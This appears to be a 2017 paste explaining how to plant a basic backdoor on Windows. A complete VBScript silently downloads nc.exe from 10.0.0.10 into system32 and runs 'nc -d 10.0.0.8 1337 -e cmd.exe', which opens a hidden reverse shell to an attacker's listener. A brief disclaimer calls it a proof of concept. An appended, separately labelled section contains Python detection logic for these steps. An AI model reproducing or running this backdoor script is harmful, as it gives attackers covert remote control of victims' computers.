Untitled

a guest
Aug 23rd, 2017
https://joncraton.org/blog/46/netcat-for-windows/

Download nc111nt.zip (password:nc) - Netcat for Windows

Create a backdoor into a Windows system
Using VBScript and netcat it is quite simple to create a basic backdoor into a user's system with the privileges of the user that ran the script. It's a very basic concept: all it does is download the netcat program (nc.exe) from a trusted website into the user's c:\windows\system32 folder. This allows you to run netcat from the command line without dealing with the full location of nc.exe. Once the file is in the system32 folder it can simply be run from any command prompt.

***This is a proof of concept and should not be used for illegal purposes. Only use this in your own test environment and I take no responsibility if you mess something up with this***

To set this up, you need to have a computer running netcat waiting for the incoming connection. To do that just run a simple command such as:

nc -l 1337

That's when we tell the script to run the following netcat command:

nc -d 10.0.0.8 1337 -e cmd.exe

What this does is tell netcat to connect to the IP 10.0.0.8 on TCP port 1337. The -e switch tells netcat to execute cmd.exe and send its output to the server waiting for the connection. The -d switch tells netcat to run in the background in a Windows environment. The user won't even know it's running without checking the process list.

Here's an example script that will automatically download nc.exe, write it to c:\windows\system32 and then execute the netcat command to connect to the remote server:

' Set your settings
strFileURL = "http://10.0.0.10/nc.exe"
strHDLocation = "C:\WINDOWS\system32\nc.exe"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If

Set objXMLHTTP = Nothing

Set objShell = CreateObject("WScript.Shell")

' Execute the connection
objShell.Exec("nc -d 10.0.0.8 1337 -e cmd.exe")
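
A defender's view of the script above, as an added example that is not part of the original paste: Python detection logic that flags the observable steps (a script host writing an executable into system32, netcat started with -e, netcat launched by a script host, and cmd.exe running as a child of netcat). The record layout and field names are assumptions, simplified from the kind of process-creation and file-creation telemetry an endpoint agent produces, and the sample records are constructed.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows Script Host binaries
NETCAT = "nc.exe"
SYSTEM32 = "\\windows\\system32\\"

def base(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()

def detect(event):
    """Return the findings for one telemetry record (assumed field names)."""
    hits = []
    actor, parent = base(event.get("image")), base(event.get("parent_image"))
    kind = event.get("event")
    if kind == "file_create":
        target = (event.get("target_filename") or "").lower()
        if actor in SCRIPT_HOSTS and SYSTEM32 in target and target.endswith(".exe"):
            hits.append("script host wrote an executable into system32")
    elif kind == "process_create":
        args = (event.get("command_line") or "").lower().split()
        if actor == NETCAT and "-e" in args:
            hits.append("netcat started with -e")
        if actor == NETCAT and parent in SCRIPT_HOSTS:
            hits.append("netcat launched by a script host")
        if actor == "cmd.exe" and parent == NETCAT:
            hits.append("cmd.exe spawned by netcat")
    return hits

def scan(events):
    """Return (record index, finding) pairs for a list of records."""
    return [(i, hit) for i, ev in enumerate(events) for hit in detect(ev)]

# Constructed sample records, not captured from a real host.
SAMPLE_EVENTS = [
    {"event": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target_filename": r"C:\WINDOWS\system32\nc.exe"},
    {"event": "process_create", "image": r"C:\WINDOWS\system32\nc.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "nc -d 10.0.0.8 1337 -e cmd.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\WINDOWS\system32\nc.exe", "command_line": "cmd.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\Users\a\notes.txt"},
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```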